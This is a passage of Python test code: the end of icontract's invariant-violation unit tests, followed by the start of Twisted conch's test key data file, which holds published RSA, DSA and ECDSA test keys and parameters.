class SomeClass:
def __init__(self) -> None:
self.x = 100
@icontract.ensure(lambda result: result > 0)
def some_method(self) -> int:
self.x = 10
return -1
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None try:
inst = SomeClass()
inst.some_method()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
result > 0:
result was -1
self was an instance of SomeClass"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_inv_violated_but_post_ok(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
@icontract.ensure(lambda result: result > 0)
def some_method(self) -> int:
self.x = -1
return 10
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None try:
inst = SomeClass()
inst.some_method()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_inv_with_empty_arguments(self) -> None:
z = 42
@icontract.invariant(lambda: z != 42)
class A:
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None try:
_ = A()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
z != 42:
self was an instance of A
z was 42"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_condition_as_function(self) -> None:
def some_condition(self: 'A') -> bool:
return self.x > 0
@icontract.invariant(some_condition)
class A:
def __init__(self) -> None:
self.x = 100
def some_method(self) -> None:
self.x = -1
def __repr__(self) -> str:
return "A(x={})".format(self.x)
a = A()
violation_error = None try:
a.some_method()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual('some_condition: self was A(x=-1)', tests.error.wo_mandatory_location(str(violation_error)))
def test_condition_as_function_with_default_argument_value(self) -> None:
def some_condition(self: 'A', y: int = 0) -> bool:
return self.x > y
@icontract.invariant(some_condition)
class A:
def __init__(self) -> None:
self.x = 100
def some_method(self) -> None:
self.x = -1
def __repr__(self) -> str:
return "A(x={})".format(self.x)
a = A()
violation_error = None try:
a.some_method()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual('some_condition: self was A(x=-1)', tests.error.wo_mandatory_location(str(violation_error)))
class TestProperty(unittest.TestCase):
def test_property_getter(self) -> None:
@icontract.invariant(lambda self: not self.toggled)
class SomeClass:
def __init__(self) -> None:
self.toggled = False
@property
def some_prop(self) -> int:
self.toggled = True
return 0
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
some_inst = SomeClass()
violation_error = None try:
_ = some_inst.some_prop
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
not self.toggled:
self was an instance of SomeClass
self.toggled was True"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_property_setter(self) -> None:
@icontract.invariant(lambda self: not self.toggled)
class SomeClass:
def __init__(self) -> None:
self.toggled = False
@property
def some_prop(self) -> int:
return 0
@some_prop.setter
def some_prop(self, value: int) -> None:
self.toggled = True
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
some_inst = SomeClass()
violation_error = None try:
some_inst.some_prop = 0
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
not self.toggled:
self was an instance of SomeClass
self.toggled was True"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_property_deleter(self) -> None:
@icontract.invariant(lambda self: not self.toggled)
class SomeClass:
def __init__(self) -> None:
self.toggled = False
@property
def some_prop(self) -> int:
return 0
@some_prop.deleter
def some_prop(self) -> None:
self.toggled = True
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
some_inst = SomeClass()
violation_error = None try:
del some_inst.some_prop
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
not self.toggled:
self was an instance of SomeClass
self.toggled was True"""), tests.error.wo_mandatory_location(str(violation_error)))
class TestError(unittest.TestCase):
def test_as_type(self) -> None:
@icontract.invariant(lambda self: self.x > 0, error=ValueError)
class A:
def __init__(self) -> None:
self.x = 0
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
value_error = None try:
_ = A()
except ValueError as err:
value_error = err
self.assertIsNotNone(value_error)
self.assertIsInstance(value_error, ValueError)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of A
self.x was 0"""), tests.error.wo_mandatory_location(str(value_error)))
def test_as_function(self) -> None:
@icontract.invariant(
lambda self: self.x > 0, error=lambda self: ValueError("x must be positive, but got: {}".format(self.x)))
class A:
def __init__(self) -> None:
self.x = 0
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
value_error = None try:
_ = A()
except ValueError as err:
value_error = err
self.assertIsNotNone(value_error)
self.assertIsInstance(value_error, ValueError)
self.assertEqual('x must be positive, but got: 0', str(value_error))
def test_as_function_with_empty_args(self) -> None:
@icontract.invariant(lambda self: self.x > 0, error=lambda: ValueError("x must be positive"))
class A:
def __init__(self) -> None:
self.x = 0
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
value_error = None try:
_ = A()
except ValueError as err:
value_error = err
self.assertIsNotNone(value_error)
self.assertIsInstance(value_error, ValueError)
self.assertEqual('x must be positive', str(value_error))
class TestToggling(unittest.TestCase):
def test_disabled(self) -> None:
@icontract.invariant(lambda self: self.x > 0, enabled=False)
class SomeClass:
def __init__(self) -> None:
self.x = -1
inst = SomeClass()
self.assertEqual(-1, inst.x)
class TestBenchmark(unittest.TestCase):
@unittest.skip("Skipped the benchmark, execute manually on a prepared benchmark machine.")
def test_benchmark_when_disabled(self) -> None:
def some_long_condition() -> bool:
time.sleep(5)
return True
@icontract.invariant(lambda self: some_long_condition(), enabled=False)
class SomeClass:
def __init__(self) -> None:
self.x = 100
class AnotherClass:
def __init__(self) -> None:
self.x = 100
start = time.time()
_ = SomeClass()
duration_with_inv = time.time() - start
start = time.time()
_ = AnotherClass()
duration_wo_inv = time.time() - start
self.assertLess(duration_with_inv / duration_wo_inv, 1.2)
class TestInvalid(unittest.TestCase):
def test_with_invalid_arguments(self) -> None:
val_err = None try:
@icontract.invariant(lambda self, z: self.x > z)
class _:
def __init__(self) -> None:
self.x = 100
except ValueError as err:
val_err = err
self.assertIsNotNone(val_err)
self.assertEqual("Expected an invariant condition with at most an argument 'self', but got: ['self', 'z']",
str(val_err))
def test_no_boolyness(self) -> None:
@icontract.invariant(lambda self: tests.mock.NumpyArray([True, False]))
class A:
def __init__(self) -> None:
pass
value_error = None try:
_ = A()
except ValueError as err:
value_error = err
self.assertIsNotNone(value_error)
self.assertEqual('Failed to negate the evaluation of the condition.',
tests.error.wo_mandatory_location(str(value_error)))
if __name__ == '__main__':
unittest.main()
| true | true |
1c4a74a5b3ae9815d30ff73f4c0fa8d735514d1e | 27,110 | py | Python | src/twisted/conch/test/keydata.py | seanicus64/twisted | c0f1394c7bfb04d97c725a353a1f678fa6a1c602 | [
"MIT",
"Unlicense"
] | 32 | 2019-11-14T07:49:33.000Z | 2022-02-16T00:49:22.000Z | src/twisted/conch/test/keydata.py | seanicus64/twisted | c0f1394c7bfb04d97c725a353a1f678fa6a1c602 | [
"MIT",
"Unlicense"
] | 9 | 2019-09-06T18:21:59.000Z | 2022-01-13T03:04:11.000Z | src/twisted/conch/test/keydata.py | seanicus64/twisted | c0f1394c7bfb04d97c725a353a1f678fa6a1c602 | [
"MIT",
"Unlicense"
] | 16 | 2019-06-25T13:26:43.000Z | 2022-03-07T07:29:12.000Z | # -*- test-case-name: twisted.conch.test.test_keys -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
# pylint: disable=I0011,C0103,W9401,W9402
"""
Data used by test_keys as well as others.
"""
from __future__ import absolute_import, division
from twisted.python.compat import long, _b64decodebytes as decodebytes
RSAData = {
'n': long('269413617238113438198661010376758399219880277968382122687862697'
'296942471209955603071120391975773283844560230371884389952067978'
'789684135947515341209478065209455427327369102356204259106807047'
'964139525310539133073743116175821417513079706301100600025815509'
'786721808719302671068052414466483676821987505720384645561708425'
'794379383191274856941628512616355437197560712892001107828247792'
'561858327085521991407807015047750218508971611590850575870321007'
'991909043252470730134547038841839367764074379439843108550888709'
'430958143271417044750314742880542002948053835745429446485015316'
'60749404403945254975473896534482849256068133525751'),
'e': long(65537),
'd': long('420335724286999695680502438485489819800002417295071059780489811'
'840828351636754206234982682752076205397047218449504537476523960'
'987613148307573487322720481066677105211155388802079519869249746'
'774085882219244493290663802569201213676433159425782937159766786'
'329742053214957933941260042101377175565683849732354700525628975'
'239000548651346620826136200952740446562751690924335365940810658'
'931238410612521441739702170503547025018016868116037053013935451'
'477930426013703886193016416453215950072147440344656137718959053'
'897268663969428680144841987624962928576808352739627262941675617'
'7724661940425316604626522633351193810751757014073'),
'p': long('152689878451107675391723141129365667732639179427453246378763774'
'448531436802867910180261906924087589684175595016060014593521649'
'964959248408388984465569934780790357826811592229318702991401054'
'226302790395714901636384511513449977061729214247279176398290513'
'085108930550446985490864812445551198848562639933888780317'),
'q': long('176444974592327996338888725079951900172097062203378367409936859'
'072670162290963119826394224277287608693818012745872307600855894'
'647300295516866118620024751601329775653542084052616260193174546'
'400544176890518564317596334518015173606460860373958663673307503'
'231977779632583864454001476729233959405710696795574874403'),
'u': long('936018002388095842969518498561007090965136403384715613439364803'
'229386793506402222847415019772053080458257034241832795210460612'
'924445085372678524176842007912276654532773301546269997020970818'
'155956828553418266110329867222673040098885651348225673298948529'
'93885224775891490070400861134282266967852120152546563278')
}
DSAData = {
'g': long("10253261326864117157640690761723586967382334319435778695"
"29171533815411392477819921538350732400350395446211982054"
"96512489289702949127531056893725702005035043292195216541"
"11525058911428414042792836395195432445511200566318251789"
"10575695836669396181746841141924498545494149998282951407"
"18645344764026044855941864175"),
'p': long("10292031726231756443208850082191198787792966516790381991"
"77502076899763751166291092085666022362525614129374702633"
"26262930887668422949051881895212412718444016917144560705"
"45675251775747156453237145919794089496168502517202869160"
"78674893099371444940800865897607102159386345313384716752"
"18590012064772045092956919481"),
'q': long(1393384845225358996250882900535419012502712821577),
'x': long(1220877188542930584999385210465204342686893855021),
'y': long("14604423062661947579790240720337570315008549983452208015"
"39426429789435409684914513123700756086453120500041882809"
"10283610277194188071619191739512379408443695946763554493"
"86398594314468629823767964702559709430618263927529765769"
"10270265745700231533660131769648708944711006508965764877"
"684264272082256183140297951")
}
ECDatanistp256 = {
'x': long('762825130203920963171185031449647317742997734817505505433829043'
'45687059013883'),
'y': long('815431978646028526322656647694416475343443758943143196810611371'
'59310646683104'),
'privateValue': long('3463874347721034170096400845565569825355565567882605'
'9678074967909361042656500'),
'curve': b'ecdsa-sha2-nistp256'
}
ECDatanistp384 = {
'privateValue': long('280814107134858470598753916394807521398239633534281633982576099083'
'35787109896602102090002196616273211495718603965098'),
'x': long('10036914308591746758780165503819213553101287571902957054148542'
'504671046744460374996612408381962208627004841444205030'),
'y': long('17337335659928075994560513699823544906448896792102247714689323'
'575406618073069185107088229463828921069465902299522926'),
'curve': b'ecdsa-sha2-nistp384'
}
ECDatanistp521 = {
'x': long('12944742826257420846659527752683763193401384271391513286022917'
'29910013082920512632908350502247952686156279140016049549948975'
'670668730618745449113644014505462'),
'y': long('10784108810271976186737587749436295782985563640368689081052886'
'16296815984553198866894145509329328086635278430266482551941240'
'591605833440825557820439734509311'),
'privateValue': long('662751235215460886290293902658128847495347691199214706697089140769'
'672273950767961331442265530524063943548846724348048614239791498442'
'5997823106818915698960565'),
'curve': b'ecdsa-sha2-nistp521'
}
privateECDSA_openssh521 = b"""-----BEGIN EC PRIVATE KEY-----
MIHcAgEBBEIAjn0lSVF6QweS4bjOGP9RHwqxUiTastSE0MVuLtFvkxygZqQ712oZ
ewMvqKkxthMQgxzSpGtRBcmkL7RqZ94+18qgBwYFK4EEACOhgYkDgYYABAFpX/6B
mxxglwD+VpEvw0hcyxVzLxNnMGzxZGF7xmNj8nlF7M+TQctdlR2Xv/J+AgIeVGmB
j2p84bkV9jBzrUNJEACsJjttZw8NbUrhxjkLT/3rMNtuwjE4vLja0P7DMTE0EV8X
f09ETdku/z/1tOSSrSvRwmUcM9nQUJtHHAZlr5Q0fw==
-----END EC PRIVATE KEY-----"""
publicECDSA_openssh521 = (b"ecdsa-sha2-nistp521 AAAAE2VjZHNhLXNoYTItbmlzdHA"
b"1MjEAAAAIbmlzdHA1MjEAAACFBAFpX/6BmxxglwD+VpEvw0hcyxVzLxNnMGzxZGF7xmNj8nlF7"
b"M+TQctdlR2Xv/J+AgIeVGmBj2p84bkV9jBzrUNJEACsJjttZw8NbUrhxjkLT/3rMNtuwjE4vLja"
b"0P7DMTE0EV8Xf09ETdku/z/1tOSSrSvRwmUcM9nQUJtHHAZlr5Q0fw== comment")
privateECDSA_openssh384 = b"""-----BEGIN EC PRIVATE KEY-----
MIGkAgEBBDAtAi7I8j73WCX20qUM5hhHwHuFzYWYYILs2Sh8UZ+awNkARZ/Fu2LU
LLl5RtOQpbWgBwYFK4EEACKhZANiAATU17sA9P5FRwSknKcFsjjsk0+E3CeXPYX0
Tk/M0HK3PpWQWgrO8JdRHP9eFE9O/23P8BumwFt7F/AvPlCzVd35VfraFT0o4cCW
G0RqpQ+np31aKmeJshkcYALEchnU+tQ=
-----END EC PRIVATE KEY-----"""
publicECDSA_openssh384 = (b"ecdsa-sha2-nistp384 AAAAE2VjZHNhLXNoYTItbmlzdHAzOD"
b"QAAAAIbmlzdHAzODQAAABhBNTXuwD0/kVHBKScpwWyOOyTT4TcJ5c9hfROT8zQcrc+lZBaCs7wl"
b"1Ec/14UT07/bc/wG6bAW3sX8C8+ULNV3flV+toVPSjhwJYbRGqlD6enfVoqZ4myGRxgAsRyGdT61A== comment")
publicECDSA_openssh = (b"ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAA"
b"AAIbmlzdHAyNTYAAABBBKimX1DZ7+Qj0SpfePMbo1pb6yGkAb5l7duC1l855yD7tEfQfqk7bc7v"
b"46We1hLMyz6ObUBYgkN/34n42F4vpeA= comment")
privateECDSA_openssh = b"""-----BEGIN EC PRIVATE KEY-----
MHcCAQEEIEyU1YOT2JxxofwbJXIjGftdNcJK55aQdNrhIt2xYQz0oAoGCCqGSM49
AwEHoUQDQgAEqKZfUNnv5CPRKl948xujWlvrIaQBvmXt24LWXznnIPu0R9B+qTtt
zu/jpZ7WEszLPo5tQFiCQ3/fifjYXi+l4A==
-----END EC PRIVATE KEY-----"""
publicRSA_openssh = (b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVaqx4I9bWG+wloV"
b"DEd2NQhEUBVUIUKirg0GDu1OmjrUr6OQZehFV1XwA2v2+qKj+DJjfBaS5b/fDz0n3WmM06QHjVy"
b"qgYwBGTJAkMgUyP95ztExZqpATpSXfD5FVks3loniwI66zoBC0hdwWnju9TMA2l5bs9auIJNm/9"
b"NNN9b0b/h9qpKSeq/631heY+Grh6HUqx6sBa9zDfH8Kk5O8/kUmWQNUZdy03w17snaY6RKXCpCn"
b"d1bqcPUWzxiwYZNW6Pd+rf81CrKfxGAugWBViC6QqbkPD5ASfNaNHjkbtM6Vlvbw7KW4CC1ffdO"
b"gTtDc1foNfICZgptyti8ZseZj3 comment")
privateRSA_openssh = b'''-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA1WqseCPW1hvsJaFQxHdjUIRFAVVCFCoq4NBg7tTpo61K+jkG
XoRVdV8ANr9vqio/gyY3wWkuW/3w89J91pjNOkB41cqoGMARkyQJDIFMj/ec7RMW
aqQE6Ul3w+RVZLN5aJ4sCOus6AQtIXcFp47vUzANpeW7PWriCTZv/TTTfW9G/4fa
qSknqv+t9YXmPhq4eh1KserAWvcw3x/CpOTvP5FJlkDVGXctN8Ne7J2mOkSlwqQp
3dW6nD1Fs8YsGGTVuj3fq3/NQqyn8RgLoFgVYgukKm5Dw+QEnzWjR45G7TOlZb28
OyluAgtX33ToE7Q3NX6DXyAmYKbcrYvGbHmY9wIDAQABAoIBACFMCGaiKNW0+44P
chuFCQC58k438BxXS+NRf54jp+Q6mFUb6ot6mB682Lqx+YkSGGCs6MwLTglaQGq6
L5n4syRghLnOaZWa+eL8H1FNJxXbKyet77RprL59EOuGR3BztACHlRU7N/nnFOeA
u2geG+bdu3NjuWfmsid/z88wm8KY/dkYNi82LvE9gXqf4QMtR9s0UWI53U/prKiL
2dbzhMQXuXGdBghCeE27xSr0w1jNVSvtvjNfBOp75gQkY/It1z0bbNWcY0MvkoiN
Pm7aGDfYDyVniR25RjReyc7Ei+2SWjMHD9+GCPmS6dvrOAg2yc3NCgFIWzk+esrG
gKnc1DkCgYEA2XAG2OK81HiRUJTUwRuJOGxGZFpRoJoHPUiPA1HMaxKOfRqxZedx
dTngMgV1jRhMr5OxSbFmX3hietEMyuZNQ7Oc9Gt95gyY3M8hYo7VLhLeBK7XJG6D
MaIVokQ9IqliJiK5su1UCp0Ig6cHDf8ZGI7Yqx3aSJwxaBGhZm3j2B0CgYEA+0QX
i6Q2vh43Haf2YWwExKrdeD4HjB4zAq4DFIeDeuWefQhnqPKqvxJwz3Kpp8cLHYjV
IP2cY8pHMFVOi8TP9H8WpJISdKEJwsRunIwz76Xl9+ArrU9cEaoahDdb/Xrqw818
sMjkH1Rjtcev3/QJp/zHJfxc6ZHXksWYHlbTsSMCgYBRr+mSn5QLSoRlPpSzO5IQ
tXS4jMnvyQ4BMvovaBKhAyauz1FoFEwmmyikAjMIX+GncJgBNHleUo7Ezza8H0tV
rOvBU4TH4WGoStSi/0ANgB8SqVDAKhh1lAwGmxZQqEvsQc177/dLyXUCaMSYuIaI
GFpD5wIzlyJkk4MMRSp87QKBgGlmN8ZA3SHFBPOwuD5HlHx2/C3rPzk8lcNDAVHE
Qpfz6Bakxu7s1EkQUDgE7jvN19DMzDJpkAegG1qf/jHNHjp+cR4ZlBpOTwzfX1LV
0Rdu7NectlWd244hX7wkiLb8r6vw76QssNyfhrADEriL4t0PwO4jPUpQ/i+4KUZY
v7YnAoGBAIVLG3qbEhA3nh+tXtr+xpb+3zVruTTiFpeSJgm9vXAgA6c1vS0boNIH
RyvU3qioBwcbuAQgpydBPGw5OelBzucXHdFMXLw90iYm/mrW/Uhyrkb6e8PTGWBE
HaUTp4D1YynUel0GBxZd9os9y2Q64oRaTYwGLS2dHOuDTHg9eVTO
-----END RSA PRIVATE KEY-----'''
# Some versions of OpenSSH generate these (slightly different keys): the PKCS#1
# structure is wrapped in an extra ASN.1 SEQUENCE and there's an empty SEQUENCE
# following it. It is not any standard key format and was probably a bug in
# OpenSSH at some point.
privateRSA_openssh_alternate = b"""-----BEGIN RSA PRIVATE KEY-----
MIIEqTCCBKMCAQACggEBANVqrHgj1tYb7CWhUMR3Y1CERQFVQhQqKuDQYO7U6aOtSvo5Bl6EVXVf
ADa/b6oqP4MmN8FpLlv98PPSfdaYzTpAeNXKqBjAEZMkCQyBTI/3nO0TFmqkBOlJd8PkVWSzeWie
LAjrrOgELSF3BaeO71MwDaXluz1q4gk2b/00031vRv+H2qkpJ6r/rfWF5j4auHodSrHqwFr3MN8f
wqTk7z+RSZZA1Rl3LTfDXuydpjpEpcKkKd3Vupw9RbPGLBhk1bo936t/zUKsp/EYC6BYFWILpCpu
Q8PkBJ81o0eORu0zpWW9vDspbgILV9906BO0NzV+g18gJmCm3K2Lxmx5mPcCAwEAAQKCAQAhTAhm
oijVtPuOD3IbhQkAufJON/AcV0vjUX+eI6fkOphVG+qLepgevNi6sfmJEhhgrOjMC04JWkBqui+Z
+LMkYIS5zmmVmvni/B9RTScV2ysnre+0aay+fRDrhkdwc7QAh5UVOzf55xTngLtoHhvm3btzY7ln
5rInf8/PMJvCmP3ZGDYvNi7xPYF6n+EDLUfbNFFiOd1P6ayoi9nW84TEF7lxnQYIQnhNu8Uq9MNY
zVUr7b4zXwTqe+YEJGPyLdc9G2zVnGNDL5KIjT5u2hg32A8lZ4kduUY0XsnOxIvtklozBw/fhgj5
kunb6zgINsnNzQoBSFs5PnrKxoCp3NQ5AoGBANlwBtjivNR4kVCU1MEbiThsRmRaUaCaBz1IjwNR
zGsSjn0asWXncXU54DIFdY0YTK+TsUmxZl94YnrRDMrmTUOznPRrfeYMmNzPIWKO1S4S3gSu1yRu
gzGiFaJEPSKpYiYiubLtVAqdCIOnBw3/GRiO2Ksd2kicMWgRoWZt49gdAoGBAPtEF4ukNr4eNx2n
9mFsBMSq3Xg+B4weMwKuAxSHg3rlnn0IZ6jyqr8ScM9yqafHCx2I1SD9nGPKRzBVTovEz/R/FqSS
EnShCcLEbpyMM++l5ffgK61PXBGqGoQ3W/166sPNfLDI5B9UY7XHr9/0Caf8xyX8XOmR15LFmB5W
07EjAoGAUa/pkp+UC0qEZT6UszuSELV0uIzJ78kOATL6L2gSoQMmrs9RaBRMJpsopAIzCF/hp3CY
ATR5XlKOxM82vB9LVazrwVOEx+FhqErUov9ADYAfEqlQwCoYdZQMBpsWUKhL7EHNe+/3S8l1AmjE
mLiGiBhaQ+cCM5ciZJODDEUqfO0CgYBpZjfGQN0hxQTzsLg+R5R8dvwt6z85PJXDQwFRxEKX8+gW
pMbu7NRJEFA4BO47zdfQzMwyaZAHoBtan/4xzR46fnEeGZQaTk8M319S1dEXbuzXnLZVnduOIV+8
JIi2/K+r8O+kLLDcn4awAxK4i+LdD8DuIz1KUP4vuClGWL+2JwKBgQCFSxt6mxIQN54frV7a/saW
/t81a7k04haXkiYJvb1wIAOnNb0tG6DSB0cr1N6oqAcHG7gEIKcnQTxsOTnpQc7nFx3RTFy8PdIm
Jv5q1v1Icq5G+nvD0xlgRB2lE6eA9WMp1HpdBgcWXfaLPctkOuKEWk2MBi0tnRzrg0x4PXlUzjAA
-----END RSA PRIVATE KEY-----"""
# Encrypted with the passphrase 'encrypted'
privateRSA_openssh_encrypted = b"""-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,FFFFFFFFFFFFFFFF
qRwdy/fEJQbRccoyOdhJCQv5FpsbSJWtvOTLjrURDrjpO0WvOsvwV/ltLAZtD8b3
CSlgi8eGZk+rFKNMn1uUWuVeQR3Mfn2PE2hgB0Qc0HkdfG92cnVzoRjKRQxxJM5o
F4/1MSLhwQxLF53DHWfyzK8rFNUBRyRRBFevXwPfbp6DhFy+TkqOcrLufJT7x7BC
MvMNjILVhNr9hnIMkzmAiBo9lhJ0CHdWhcQHaX7Wk6UcGNDsYrwBoLlKPQlEGMU1
2scCi1UAbCilVLyUpHFuQeCzJHBl0YuLjwmo1kSv9U5E4ysh/FIuRf3aW91OK1+y
5rPE+zJYnzNAZ/Rl9xqtvTh8hlMwjdt582HbiJb6zJw5/NEz9OKyaJjjqZsZQ1TY
GOhV0Oqwx54jpkCh0XwJ2ofmcNuiO8LoUVBE124pa6ePSxLorqBhtq9nTgwUv1Mx
lFioAM6xGBSugCRZgbapHAw0M/I8Fa95A2ocRgx0N6TMp3ZBVltovb8pZrAGld3L
T5VWGDl3ZX/eM8YlXDupewOpb56g55Aevl0jERktqJdl+g9D+PXnCsJgxMcJbfl5
tWY9KoMxV+2Fj68SHdr/acCp7xgUMwHvVLFfYCeK/hpEe9O8vOAMTlXuq9zCMDAx
kL2kcSFbZHerc4TijtjXEALo06gYHEcLRtI6lvYrzbbmpCD7J7AnMzS3SQ2FzbFM
GARKfxBnYp0dZTDiY5HE45r8xWzUupoFcIuxKtuhBEtT7H2Ynv1NmU9qQRj8C1U5
LgM3lVEkrh4o1aBIAqX0OA4do08h2pdp9v0E4HKtCjSL5EBC6xrxmIY6b6dwCDLU
n16mv4jeKGy2IKvnF9r8HXdUG0yisNGxeq5Uf7STGH5KcCRrJCBZbawAbwURaLRo
HVydDP+5uEMMVjULpYgtuNo6gw6NczOhzgYAm3v2ZMjmZ8gclOsbRrH74XiOV8kd
89oYN5yNHD2EBqP5271kbmsYZ3VwBGN+HUdWIDi3gbFfHcmy59YQt09mZIMMwD7r
nRK+AKfBnNeMK9yZkkTRs3FwY4ZJdYn58pWfe4DNqMI7U5BQ9QZnLkfGLUqWtghX
jrselJrtSEMkll+feFf7jxiCKAwC/cWe1cvukjYPA6k75Wv7RaDENfwMlZtN+pfl
pzKqId20HhMNOceaeZagL+xzM1RRj+VcXR9BWfHI2AXZPcpTGAJwDOoQA64L9YGW
7QzxHmcDTlV0e59CpAdCLj//rQxFpYnuuJlwV2YyHYnvzfxsVge7u5ApcuBpNTjf
N46Heh24xXfqfM7OcO3BB71VfcvCNQavsp70PAtj4loShX6FpzatNX0iZasB988E
TtuiJ+9e7vH0xEhBLJIUJT9LvMto25KLHFHwSQXKEXM+hiY2nfObc1Cku4lBmy+7
uWpZrh3hkmKUtfdiyeqUUj1ypwZ6boZO1UZo0xTrpubmKQEvd2957YrEEVsi0LeB
uEzSlUXrwIV7Qw2VhoLxIaCyl5j4nOKetUeAjqVNi9makh0x4Ion5osxxYvYS9s/
Y48ATMnwm3+CdN6LE3IykHyHs7JuZmawWDR4CKJB6M1r0X+Xwgs0tQ==
-----END RSA PRIVATE KEY-----"""
# Encrypted with the passphrase 'testxp'. NB: this key was generated by
# OpenSSH, so it doesn't use the same key data as the other keys here.
privateRSA_openssh_encrypted_aes = b"""-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0673309A6ACCAB4B77DEE1C1E536AC26
4Ed/a9OgJWHJsne7yOGWeWMzHYKsxuP9w1v0aYcp+puS75wvhHLiUnNwxz0KDi6n
T3YkKLBsoCWS68ApR2J9yeQ6R+EyS+UQDrO9nwqo3DB5BT3Ggt8S1wE7vjNLQD0H
g/SJnlqwsECNhh8aAx+Ag0m3ZKOZiRD5mCkcDQsZET7URSmFytDKOjhFn3u6ZFVB
sXrfpYc6TJtOQlHd/52JB6aAbjt6afSv955Z7enIi+5yEJ5y7oYQTaE5zrFMP7N5
9LbfJFlKXxEddy/DErRLxEjmC+t4svHesoJKc2jjjyNPiOoGGF3kJXea62vsjdNV
gMK5Eged3TBVIk2dv8rtJUvyFeCUtjQ1UJZIebScRR47KrbsIpCmU8I4/uHWm5hW
0mOwvdx1L/mqx/BHqVU9Dw2COhOdLbFxlFI92chkovkmNk4P48ziyVnpm7ME22sE
vfCMsyirdqB1mrL4CSM7FXONv+CgfBfeYVkYW8RfJac9U1L/O+JNn7yee414O/rS
hRYw4UdWnH6Gg6niklVKWNY0ZwUZC8zgm2iqy8YCYuneS37jC+OEKP+/s6HSKuqk
2bzcl3/TcZXNSM815hnFRpz0anuyAsvwPNRyvxG2/DacJHL1f6luV4B0o6W410yf
qXQx01DLo7nuyhJqoH3UGCyyXB+/QUs0mbG2PAEn3f5dVs31JMdbt+PrxURXXjKk
4cexpUcIpqqlfpIRe3RD0sDVbH4OXsGhi2kiTfPZu7mgyFxKopRbn1KwU1qKinfY
EU9O4PoTak/tPT+5jFNhaP+HrURoi/pU8EAUNSktl7xAkHYwkN/9Cm7DeBghgf3n
8+tyCGYDsB5utPD0/Xe9yx0Qhc/kMm4xIyQDyA937dk3mUvLC9vulnAP8I+Izim0
fZ182+D1bWwykoD0997mUHG/AUChWR01V1OLwRyPv2wUtiS8VNG76Y2aqKlgqP1P
V+IvIEqR4ERvSBVFzXNF8Y6j/sVxo8+aZw+d0L1Ns/R55deErGg3B8i/2EqGd3r+
0jps9BqFHHWW87n3VyEB3jWCMj8Vi2EJIfa/7pSaViFIQn8LiBLf+zxG5LTOToK5
xkN42fReDcqi3UNfKNGnv4dsplyTR2hyx65lsj4bRKDGLKOuB1y7iB0AGb0LtcAI
dcsVlcCeUquDXtqKvRnwfIMg+ZunyjqHBhj3qgRgbXbT6zjaSdNnih569aTg0Vup
VykzZ7+n/KVcGLmvX0NesdoI7TKbq4TnEIOynuG5Sf+2GpARO5bjcWKSZeN/Ybgk
gccf8Cqf6XWqiwlWd0B7BR3SymeHIaSymC45wmbgdstrbk7Ppa2Tp9AZku8M2Y7c
8mY9b+onK075/ypiwBm4L4GRNTFLnoNQJXx0OSl4FNRWsn6ztbD+jZhu8Seu10Jw
SEJVJ+gmTKdRLYORJKyqhDet6g7kAxs4EoJ25WsOnX5nNr00rit+NkMPA7xbJT+7
CfI51GQLw7pUPeO2WNt6yZO/YkzZrqvTj5FEwybkUyBv7L0gkqu9wjfDdUw0fVHE
xEm4DxjEoaIp8dW/JOzXQ2EF+WaSOgdYsw3Ac+rnnjnNptCdOEDGP6QBkt+oXj4P
-----END RSA PRIVATE KEY-----"""
publicRSA_lsh = (
b'{KDEwOnB1YmxpYy1rZXkoMTQ6cnNhLXBrY3MxLXNoYTEoMTpuMjU3OgDVaqx4I9bWG+wloVD'
b'Ed2NQhEUBVUIUKirg0GDu1OmjrUr6OQZehFV1XwA2v2+qKj+DJjfBaS5b/fDz0n3WmM06QHj'
b'VyqgYwBGTJAkMgUyP95ztExZqpATpSXfD5FVks3loniwI66zoBC0hdwWnju9TMA2l5bs9auI'
b'JNm/9NNN9b0b/h9qpKSeq/631heY+Grh6HUqx6sBa9zDfH8Kk5O8/kUmWQNUZdy03w17snaY'
b'6RKXCpCnd1bqcPUWzxiwYZNW6Pd+rf81CrKfxGAugWBViC6QqbkPD5ASfNaNHjkbtM6Vlvbw'
b'7KW4CC1ffdOgTtDc1foNfICZgptyti8ZseZj3KSgxOmUzOgEAASkpKQ==}'
)
privateRSA_lsh = (
